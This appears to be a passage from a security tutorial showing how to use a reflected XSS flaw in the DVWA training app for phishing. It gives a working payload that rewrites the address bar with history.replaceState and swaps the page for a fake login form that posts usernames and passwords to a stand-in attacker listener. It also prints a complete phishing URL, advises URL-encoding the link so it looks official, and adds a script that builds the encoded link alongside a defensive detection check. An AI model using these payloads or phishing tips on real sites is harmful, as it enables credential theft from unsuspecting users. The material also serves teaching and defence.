In Practice
Up to this point we have seen how UI redressing with history.replaceState can be used to change the address bar. Let's leverage that and also rewrite the HTML page into something more fitting of a login URL.
Using the script below we can change the displayed URL to http://dvwa/login and also render a new HTML body for it with document.body.innerHTML.
<script>
// Rewrite the address bar only; no navigation happens and the origin stays dvwa.
history.replaceState(null, null, '../../../login');
// Replace the page body with a fake login form that submits to the attacker's listener.
// The inputs need name attributes, otherwise the browser submits nothing.
document.body.innerHTML = "<br><br><br><br><br><center><h2>Please login to access secure portion of our site.</h2><form action='http://SomeMaliciousListener'>Username: <input type='text' name='username'>Password: <input type='password' name='password'><input value='submit' type='submit'></form></center>";
</script>
That's it. We can send a phishing email with a link to a page that is vulnerable to reflected XSS and include that code as the payload:
http://dvwa/vulnerabilities/xss_r/?name=<script>history.replaceState(null, null, '../../../login');document.body.innerHTML = "<br><br><br><br><br><center><h2>Please login to access secure portion of our site.</h2><form action='http://SomeMaliciousListener'>Username: <input type='text' name='username'>Password: <input type='password' name='password'><input value='submit' type='submit'></form></center>";</script>
Even though the page that is expected to load looks similar to this:

When the victim clicks the link, the login page below loads instead:

What about site certificates? They are not a problem for the attacker. The victim is still on the real site, over its real TLS connection, so the padlock and the certificate check out; they are just at a URL that does not exist for anyone but them, because replaceState changed the address bar without loading anything. The one thing that actually leaves the origin is the form submission to http://SomeMaliciousListener, and only someone watching the network traffic would notice that.
Won't they notice something weird about the URL? Perhaps. I do not recommend sending a URL that is full of raw HTML and JavaScript; URL-encoding the payload, so the link becomes a long run of percent-encoded characters, is much more favorable.
This URL looks much more 'official'. Most people will see this URL and think:
"Oh, just your typical super long URL, must be official. Let me check my training. Yup, goes to the domain I expect; yup, certificate is valid; must be a real site. Safe to log in."
I think that the long URL lends itself towards being perceived as more legitimate.
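The following is an added example, not code from the original post. It builds the URL-encoded phishing link recommended above from the payload shown earlier, and adds the check a defender would want on the other side: percent-decode every query parameter (including double-encoded ones) and flag script or address-bar-rewriting markers. The host dvwa, the name parameter and http://SomeMaliciousListener come from the post; the marker list is this example's own assumption.

```javascript
// Added example, not code from the original post. Builds the URL-encoded
// phishing link from the payload and checks query parameters for reflected
// script / history-rewriting markers after decoding. The host "dvwa", the
// "name" parameter and "http://SomeMaliciousListener" come from the post;
// the MARKERS list is this example's own assumption.

// The payload from the post, with name attributes on the inputs so that the
// browser actually submits the credentials (unnamed inputs are not sent).
const PAYLOAD =
  "<script>history.replaceState(null, null, '../../../login');" +
  "document.body.innerHTML = \"<br><br><br><br><br><center>" +
  "<h2>Please login to access secure portion of our site.</h2>" +
  "<form action='http://SomeMaliciousListener'>" +
  "Username: <input type='text' name='username'>" +
  "Password: <input type='password' name='password'>" +
  "<input value='submit' type='submit'></form></center>\";</script>";

const VULNERABLE_PAGE = "http://dvwa/vulnerabilities/xss_r/";

// Build the phishing link. encodeURIComponent turns every byte outside the
// unreserved set into %XX, so <, >, ", space and / disappear from view and
// the result is the "typical super long url".
function buildPhishingUrl(base, param, payload) {
  return `${base}?${param}=${encodeURIComponent(payload)}`;
}

// Decode a parameter value the way the server eventually will, repeating so
// that a double-encoded payload (%253C -> %3C -> <) is unwrapped as well.
function fullyDecode(value, maxRounds = 3) {
  let out = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(out);
    } catch (e) {
      break; // malformed %-sequence; stop with what we have
    }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Markers of a reflected script or of the address-bar trick itself (assumed list).
const MARKERS = [
  /<script\b/i,
  /\bhistory\.(replaceState|pushState)\s*\(/i,
  /\.innerHTML\s*=/i,
  /\bon[a-z]+\s*=/i, // inline event handlers such as onerror=
];

// Return one entry per query parameter that contains any marker after decoding.
function flagSuspiciousParams(url) {
  const u = new URL(url); // searchParams already applies one decoding round
  const hits = [];
  for (const [param, raw] of u.searchParams) {
    const decoded = fullyDecode(raw);
    const matched = MARKERS.filter((re) => re.test(decoded)).map((re) => re.source);
    if (matched.length > 0) hits.push({ param, matched });
  }
  return hits;
}

// Usage: print the encoded link and what the check says about it.
const phishingLink = buildPhishingUrl(VULNERABLE_PAGE, "name", PAYLOAD);
console.log(phishingLink);
console.log(flagSuspiciousParams(phishingLink));
```

The encoded link round-trips to the exact payload once the server decodes the name parameter, which is why the encoding hides nothing from the vulnerable page; it only hides the payload from the victim. The check deliberately runs the decoder more than once, because a single decode is what a naive filter does and a double-encoded payload walks straight past it.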